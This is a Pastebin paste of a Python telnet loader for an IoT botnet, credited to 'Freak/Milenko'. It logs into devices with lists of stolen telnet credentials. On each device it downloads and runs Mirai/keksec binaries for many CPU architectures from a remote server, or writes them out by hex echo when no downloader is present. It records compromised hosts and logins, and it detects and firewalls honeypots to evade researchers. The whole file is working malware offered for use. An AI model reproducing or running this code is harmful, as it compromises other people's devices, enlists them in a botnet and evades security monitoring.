Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #Phaaaat hax telnet loader by Freak/Milenko
- #this loader actively detects honeypots using incorrect user agents when requesting bins.
- #it will actively block any detected honeypot with iptables.
- #USAGE(S):
- #ANTI HONEYPOT MODE:
- #cat list.txt | python loader.py 1 8081
- #DUMBASS MODE
- #cat list.txt | python loader.py 0
- #SELFREP MODE (recommended) configure capsaicin for scanlisten port
- #ncat -kvlp scanlistenport | python loader.py 1 8081
- import sys, re, os, socket, time, select,sys
- from threading import Thread
- serverip = "1.3.3.7"
- binprefix = "/bins/keksec"
- binname = binprefix.split("/")[-1]
- rekdevice = """cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
- cd /tmp || cd $(find / -writable | head -n 1);
- wget http://""" + serverip + binprefix + """.mips -O keksec.mips; busybox wget http://""" + serverip + binprefix + """.mips -O keksec.mips; chmod 777 """ + binname + """.mips; ./""" + binname + """.mips; rm -f """ + binname + """.mips
- wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; busybox wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; chmod 777 """ + binname + """.mpsl; ./""" + binname + """.mpsl; rm -f """ + binname + """.mpsl
- wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; busybox wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; chmod 777 """ + binname + """.sh4; ./""" + binname + """.sh4; rm -f """ + binname + """.sh4
- wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; busybox wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; chmod 777 """ + binname + """.x86; ./""" + binname + """.x86; rm -f """ + binname + """.x86
- wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; busybox wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; chmod 777 """ + binname + """.arm7; ./""" + binname + """.arm7; rm -f """ + binname + """.arm7
- wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; busybox wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; chmod 777 """ + binname + """.x64; ./""" + binname + """.x64; rm -f """ + binname + """.x64
- wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; busybox wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; chmod 777 """ + binname + """.ppc; ./""" + binname + """.ppc; rm -f """ + binname + """.ppc
- wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; busybox wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; chmod 777 """ + binname + """.i586; ./""" + binname + """.i586; rm -f """ + binname + """.i586
- wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; busybox wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; chmod 777 """ + binname + """.m68k; ./""" + binname + """.m68k; rm -f """ + binname + """.m68k
- wget http://""" + serverip + binprefix + """.spc -O keksec.spc; busybox wget http://""" + serverip + binprefix + """.spc -O keksec.spc; chmod 777 """ + binname + """.spc; ./""" + binname + """.spc; rm -f """ + binname + """.spc
- wget http://""" + serverip + binprefix + """.arm -O keksec.arm; busybox wget http://""" + serverip + binprefix + """.arm -O keksec.arm; chmod 777 """ + binname + """.arm; ./""" + binname + """.arm; rm -f """ + binname + """.arm
- wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; busybox wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; chmod 777 """ + binname + """.arm5; ./""" + binname + """.arm5; rm -f """ + binname + """.arm5
- wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; busybox wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; chmod 777 """ + binname + """.ppc-440fp; ./""" + binname + """.ppc-440fp; rm -f """ + binname + """.ppc-440fp"""
- rekdevice = rekdevice.replace("\r", "").split("\n")
- global fh
- fh = open("bots.txt","a+")
- def chunkify(lst,n):
- return [ lst[i::n] for i in xrange(n) ]
- running = 0
- global echo
- global tftp
- global wget
- global logins
- global echoed
- echoed = []
- tftp = 0
- wget = 0
- echo = 0
- logins = 0
- ran = 0
- def printStatus():
- global echo
- global tftp
- global wget
- global logins
- global ran
- while 1:
- time.sleep(5)
- print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + " Ran:" + str(ran) + " Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
- def readUntil(tn, advances, timeout=8):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.1)
- for advance in advances:
- if advance in buf: return buf
- return ""
- def recvTimeout(sock, size, timeout=8):
- sock.setblocking(0)
- ready = select.select([sock], [], [], timeout)
- if ready[0]:
- data = sock.recv(size)
- return data
- return ""
- def contains(data, array):
- for test in array:
- if test in data:
- return True
- return False
- def split_bytes(s, n):
- assert n >= 4
- start = 0
- lens = len(s)
- while start < lens:
- if lens - start <= n:
- yield s[start:]
- return # StopIteration
- end = start + n
- assert end > start
- yield s[start:end]
- start = end
- global badips
- badips=[]
- def fileread():
- fh=open("honeypots.txt", "rb")
- data=fh.read()
- fh.close()
- return data
- def clientHandler(c, addr):
- global badips
- try:
- if addr[0] not in badips and addr[0] not in fileread():
- print addr[0] + ":" + str(addr[1]) + " has connected!"
- request = recvTimeout(c, 8912)
- if "curl" not in request and "Wget" not in request:
- if addr[0] not in fileread():
- fh=open("honeypots.txt", "a")
- fh.write(addr[0]+"\n")
- fh.close()
- os.popen("iptables -A INPUT -s " + addr[0] + " -j DROP")
- badips.append(addr[0])
- print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!"
- c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
- for i in range(10):
- c.send(os.urandom(65535*2))
- else:
- c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
- for i in range(10):
- c.send(os.urandom(65535*2))
- c.close()
- except Exception as e:
- #print str(e)
- pass
- def honeyserver(honeyport):
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- s.bind(('', honeyport))
- s.listen(999999999)
- while 1:
- try:
- c, addr = s.accept()
- Thread(target=clientHandler, args=(c, addr,)).start()
- except:
- pass
- if sys.argv[1]=="1":
- Thread(target=honeyserver, args=(int(sys.argv[2]),)).start()
- def infect(ip, username, password):
- global badips
- global echo
- global tftp
- global wget
- global logins
- global ran
- global echoed
- if ip in echoed:
- return
- infectedkey = "CAPSAICIN"
- try:
- tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- tn.settimeout(1)
- tn.connect((ip, 23))
- except:
- try:
- tn.close()
- except:
- pass
- return
- try:
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(username + "\n")
- time.sleep(0.1)
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(password + "\n")
- time.sleep(0.8)
- else:
- pass
- prompt = ''
- prompt += recvTimeout(tn, 8192)
- if ">" in prompt and "ONT" not in prompt:
- success = True
- elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
- success = True
- else:
- tn.close()
- return
- except:
- tn.close()
- return
- if success == True:
- try:
- tn.send("enable\r\n")
- tn.send("system\r\n")
- tn.send("shell\r\n")
- tn.send("sh\r\n")
- tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
- except:
- tn.close()
- return
- time.sleep(1)
- try:
- buf = recvTimeout(tn, 8192)
- except:
- tn.close()
- return
- if "AK47" in buf:
- if sys.argv[1] == "1":
- tn.send("wget http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
- tn.send("curl http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
- time.sleep(3)
- recvTimeout(tn, 8192)
- if ip in badips:
- return
- print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- logins += 1
- fh.write(ip + ":23 " + username + ":" + password + "\n")
- fh.flush()
- for rek in rekdevice:
- tn.send(rek + "\r\n")
- time.sleep(3)
- buf = recvTimeout(tn, 1024*1024)
- loaded = False
- if "bytes" in buf:
- print "\033[32m[\033[31m+\033[32m] \033[33mwget \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- tftp += 1
- loaded = True
- elif "saved" in buf:
- print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- wget += 1
- loaded = True
- if infectedkey in buf:
- ran += 1
- print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- f=open("infected.txt", "a")
- f.write(ip +":23 " + username + ":" + password + "\r\n")
- f.close()
- #if loaded:
- # tn.close()
- # return
- tn.send("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /\r\n")
- tn.send("cat /proc/mounts;busybox cat /proc/mounts\r\n")
- mounts = recvTimeout(tn, 1024*1024)
- for line in mounts.split("\n"):
- try:
- path = line.split(" ")[1]
- if " rw" in line:
- tn.send("echo -e '%s' > %s/.keksec; cat %s/.keksec;busybox cat %s/.keksec; rm %s/.keksec;busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
- if "AK47" in recvTimeout(tn, 1024*1024):
- tn.send("cd %s\r\n" % path) #cd into the writeable directory
- except:
- continue
- for binary in "dlr.arm dlr.arm7 dlr.mips dlr.x86 dlr.mpsl dlr.m68k dlr.sh4 dlr.ppc dlr.spc".split(" "):
- try:
- first = True
- count = 0
- hexdata = []
- for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
- hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
- parts = len(hexdata)
- for hexchunk in hexdata:
- seq = ">" if first else ">>"
- tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")#;busybox echo -ne '" + hexchunk + "' " + seq + "\r\n")
- first = False
- count += 1
- time.sleep(0.01)
- print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
- tn.send("chmod 777 updDl;busybox chmod 777 updDl\r\n")
- tn.send("./updDl\r\n")
- time.sleep(5)
- tn.send("rm -rf ./updDl\r\n")
- time.sleep(0.1)
- tn.send("./gsdfsdf424r24\r\n") #change this to dvrHelper if using mirai
- time.sleep(1)
- tn.send("rm -rf ./gsdfsdf424r24\r\n") #and this
- buf = recvTimeout(tn, 1024*1024)
- if "FIN" in buf:
- echo += 1
- print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
- tn.close()
- f=open("echoes.txt","a")
- f.write(ip +":23 " + username + ":" + password + "\r\n")
- f.close()
- echoed.append(ip)
- if infectedkey in buf:
- ran += 1
- f=open("infected.txt", "a")
- f.write(ip +":23 " + username + ":" + password + "\r\n")
- f.close()
- print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- tn.close()
- return
- except Exception as e:
- # print str(e)
- return
- else:
- # tn.close()
- return
- def check(chunk, fh):
- global running
- running += 1
- threadID = running
- for login in chunk:
- try:
- port = 23
- if ":23 " in login:
- login = login.replace(":23 ", ":")
- port = 23
- if ":2323 " in login:
- login = login.replace(":2323 ", ":")
- port = 2323
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(1)
- try:
- socket.inet_aton(login.split(":")[0])
- ip = login.split(":")[0]
- username = login.split(":")[1]
- password = login.split(":")[2]
- except:
- try:
- socket.inet_aton(login.split(":")[2])
- ip = login.split(":")[2]
- username = login.split(":")[0]
- password = login.split(":")[1]
- except:
- continue
- s.connect((ip, port))
- s.close()
- infect(ip, username, password)
- except:
- pass
- running -= 1
- while 1:
- if running >= 512:
- time.sleep(0.3)
- try:
- Thread(target = check, args = ([raw_input()], fh,)).start()
- except KeyboardInterrupt:
- os.kill(os.getpid(), 9)
- except Exception:
- pass
Add Comment
Please, Sign In to add comment